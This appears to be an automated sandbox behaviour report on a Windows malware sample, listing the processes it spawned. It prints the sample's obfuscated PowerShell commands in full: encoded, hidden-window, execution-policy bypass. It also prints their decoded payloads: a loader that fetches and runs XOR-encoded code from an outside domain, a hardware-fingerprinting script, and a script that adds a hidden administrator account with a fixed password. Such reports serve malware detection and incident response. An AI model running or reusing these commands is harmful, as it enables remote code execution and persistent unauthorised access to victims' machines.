        Source: svczHost.exe, 00000011.00000002.4159812586.000001ABA7EC1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3673760804.00000252E79DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\Temp\svczHost.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\Temp\myRdpService.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Bypasses PowerShell execution policy
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoweRSheLL -W hiddEN -NoLOgo -NOp -Ep byPaSS -eNCOdEDcoMmANd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA=="
        Encrypted powershell cmdline option found
        Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded IEX ([TEXt.EncODInG]::UTF8.GetSTRIng((iwr ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("aHR0cHM6Ly91eXQxbjhkZWQ5ZmIzODAuY29tL3N5YnBj")))).COnTENt))
        Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $uri = "https://uyt1n8ded9fb380.com/file2/0e2b542dde5230d991123cf170512b0225ae8c373d66c8038f016679055f4d5229f8d5ac1df1afd229806593a24a07475c330ced357e5b62ca14794fc90cf9b5b18130bb75e02c6ba1e793807fb6a969dd58fac8a5f2f62a9469dc681627f3d76f41fb2548f810a2297e414d6c9ab966";$count = 100;function Send { param( [PSObject] $logMsg ) # Convert body to string $stringBody = [string]($logMsg | ConvertTo-Json); $logMessages = @(); $logMessages += $stringBody; $logMessages += "----------"; $headers = @{}; $key = "Content-Type"; $value = "application/json"; $headers[$key] = $value; $uri = "LOGURL"; try { $body = $logMessages | ConvertTo-Json; Invoke-WebRequest -Uri $uri -Method Post -Headers $headers -Body $body } catch{ } }while($count -gt 0){try{ Send "begin download $uri";$content = Invoke-WebRequest -Uri $uri -UseBasicParsing; $byteArray = $content.content; for ($i = 0; $i -lt $byteArray.Length; $i++) { $byteArray[$i] = $byteArray[$i] -bxor 1; }Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($byteArray));break;}catch{Send $_.Exception.Message;$count -= 1;Start-Sleep -s 15;}}
        Source: C:\Windows\Temp\svczHost.exeProcess created: Base64 decoded function Get-Identity{ $hardDrives = Get-WmiObject -Class Win32_DiskDrive | Where-Object { $_.MediaType -eq "Fixed hard disk media" -or $_.MediaType -eq "Fixed hard disk media - SSD" }$driveInfoArray = @()foreach ($hardDrive in $hardDrives) { $serialNumber = $hardDrive.SerialNumber $model = $hardDrive.Model $driveInfo = "Serial Number: $serialNumber, Model: $model" $driveInfoArray += $driveInfo}$combinedInfo = $driveInfoArray -join "`r`n"$cpuInfo = Get-WmiObject -Class Win32_Processor$cpuDetails = "ProcessorId: $($cpuInfo.ProcessorId), Name: $($cpuInfo.Name), MaxClockSpeed: $($cpuInfo.MaxClockSpeed), UniqueId: $($cpuInfo.UniqueId)"$allInfo = "$combinedInfo`r`n$cpuDetails"$md5 = New-Object System.Security.Cryptography.MD5CryptoServiceProvider$bytes = [System.Text.Encoding]::UTF8.GetBytes($allInfo)$hashBytes = $md5.ComputeHash($bytes)$hash = [BitConverter]::ToString($hashBytes) -replace '-' return $hash;}cd "C:\Windows\Temp";$test = Get-Identity;$test | Out-File -FilePath "deviceId.txt" -Encoding UTF8
        Source: C:\Windows\Temp\svczHost.exeProcess created: Base64 decoded $Username = "User1";$pwd = "123456789!A1a"; $UserParams = @{'Name' = $Username; 'Password' = (ConvertTo-SecureString -String $pwd -AsPlainText -Force); 'PasswordNeverExpires' = $true};New-LocalUser @UserParams;$GroupParams = @{'Group' = 'Administrators'; 'Member' = $Username};Add-LocalGroupMember @GroupParams;
        Source: C:\Windows\Temp\svczHost.exeProcess created: Base64 decoded get-service "myRdpService"
        Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded IEX ([TEXt.EncODInG]::UTF8.GetSTRIng((iwr ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("aHR0cHM6Ly91eXQxbjhkZWQ5ZmIzODAuY29tL3N5YnBj")))).COnTENt))Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $uri = "https://uyt1n8ded9fb380.com/file2/0e2b542dde5230d991123cf170512b0225ae8c373d66c8038f016679055f4d5229f8d5ac1df1afd229806593a24a07475c330ced357e5b62ca14794fc90cf9b5b18130bb75e02c6ba1e793807fb6a969dd58fac8a5f2f62a9469dc681627f3d76f41fb2548f810a2297e414d6c9ab966";$count = 100;function Send { param( [PSObject] $logMsg ) # Convert body to string $stringBody = [string]($logMsg | ConvertTo-Json); $logMessages = @(); $logMessages += $stringBody; $logMessages += "----------"; $headers = @{}; $key = "Content-Type"; $value = "application/json"; $headers[$key] = $value; $uri = "LOGURL"; try { $body = $logMessages | ConvertTo-Json; Invoke-WebRequest -Uri $uri -Method Post -Headers $headers -Body $body } catch{ } }while($count -gt 0){try{ Send "begin download $uri";$content = Invoke-WebRequest -Uri $uri -UseBasicParsing; $byteArray = $content.content; for ($i = 0; $i -lt $byteArray.Length; $i++) { $byteArray[$i] = $byteArray[$i] -bxor 1; }Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($byteArray));break;}catch{Send $_.Exception.Message;$count -= 1;Start-Sleep -s 15;}}Jump to behavior
        Source: C:\Windows\Temp\svczHost.exeProcess created: Base64 decoded function Get-Identity{ $hardDrives = Get-WmiObject -Class Win32_DiskDrive | Where-Object { $_.MediaType -eq "Fixed hard disk media" -or $_.MediaType -eq "Fixed hard disk media - SSD" }$driveInfoArray = @()foreach ($hardDrive in $hardDrives) { $serialNumber = $hardDrive.SerialNumber $model = $hardDrive.Model $driveInfo = "Serial Number: $serialNumber, Model: $model" $driveInfoArray += $driveInfo}$combinedInfo = $driveInfoArray -join "`r`n"$cpuInfo = Get-WmiObject -Class Win32_Processor$cpuDetails = "ProcessorId: $($cpuInfo.ProcessorId), Name: $($cpuInfo.Name), MaxClockSpeed: $($cpuInfo.MaxClockSpeed), UniqueId: $($cpuInfo.UniqueId)"$allInfo = "$combinedInfo`r`n$cpuDetails"$md5 = New-Object System.Security.Cryptography.MD5CryptoServiceProvider$bytes = [System.Text.Encoding]::UTF8.GetBytes($allInfo)$hashBytes = $md5.ComputeHash($bytes)$hash = [BitConverter]::ToString($hashBytes) -replace '-' return $hash;}cd "C:\Windows\Temp";$test = Get-Identity;$test | Out-File -FilePath "deviceId.txt" -Encoding UTF8
        Source: C:\Windows\Temp\svczHost.exeProcess created: Base64 decoded $Username = "User1";$pwd = "123456789!A1a"; $UserParams = @{'Name' = $Username; 'Password' = (ConvertTo-SecureString -String $pwd -AsPlainText -Force); 'PasswordNeverExpires' = $true};New-LocalUser @UserParams;$GroupParams = @{'Group' = 'Administrators'; 'Member' = $Username};Add-LocalGroupMember @GroupParams;
        Source: C:\Windows\Temp\svczHost.exeProcess created: Base64 decoded get-service "myRdpService"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoweRSheLL -W hiddEN -NoLOgo -NOp -Ep byPaSS -eNCOdEDcoMmANd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA==" Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wr03xjs0\wr03xjs0.cmdline"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfileJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AMABlADIAYgA1ADQAMgBkAGQAZQA1ADIAMwAwAGQAOQA5ADEAMQAyADMAYwBmADEANwAwADUAMQAyAGIAMAAyADIANQBhAGUAOABjADMANwAzAGQANgA2AGMAOAAwADMAOABmADAAMQA2ADYANwA5ADAANQA1AGYANABkADUAMgAyADkAZgA4AGQANQBhAGMAMQBkAGYAMQBhAGYAZAAyADIAOQA4ADAANgA1ADkAMwBhADIANABhADAANwA0ADcANQBjADMAMwAwAGMAZQBkADMANQA3AGUANQBiADYAMgBjAGEAMQA0ADcAOQA0AGYAYwA5ADAAYwBmADkAYgA1AGIAMQA4ADEAMwAwAGIAYgA3ADUAZQAwADIAYwA2AGIAYQAxAGUANwA5ADMAOAAwADcAZgBiADYAYQA5ADYAOQBkAGQANQA4AGYAYQBjADgAYQA1AGYAMgBmADYAMgBhADkANAA2ADkAZABjADYAOAAxADYAMgA3AGYAMwBkADcANgBmADQAMQBmAGIAMgA1ADQAOABmADgAMQAwAGEAMgAyADkANwBlADQAMQA0AGQANgBjADkAYQBiADkANgA2ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFF9A.tmp" "c:\Users\user\AppData\Local\Temp\wr03xjs0\CSC787E510638EC4229B85DAEC3AD1CFCC9.TMP"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\AppData\Local\Temp\SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AMABlADIAYgA1ADQAMgBkAGQAZQA1ADIAMwAwAGQAOQA5ADEAMQAyADMAYwBmADEANwAwADUAMQAyAGIAMAAyADIANQBhAGUAOABjADMANwAzAGQANgA2AGMAOAAwADMAOABmADAAMQA2ADYANwA5ADAANQA1AGYANABkADUAMgAyADkAZgA4AGQANQBhAGMAMQBkAGYAMQBhAGYAZAAyADIAOQA4ADAANgA1ADkAMwBhADIANABhADAANwA0ADcANQBjADMAMwAwAGMAZQBkADMANQA3AGUANQBiADYAMgBjAGEAMQA0ADcAOQA0AGYAYwA5ADAAYwBmADkAYgA1AGIAMQA4ADEAMwAwAGIAYgA3ADUAZQAwADIAYwA2AGIAYQAxAGUANwA5ADMAOAAwADcAZgBiADYAYQA5ADYAOQBkAGQANQA4AGYAYQBjADgAYQA1AGYAMgBmADYAMgBhADkANAA2ADkAZABjADYAOAAxADYAMgA3AGYAMwBkADcANgBmADQAMQBmAGIAMgA1ADQAOABmADgAMQAwAGEAMgAyADkANwBlADQAMQA0AGQANgBjADkAYQBiADkANgA2ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgADJump to behavior
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
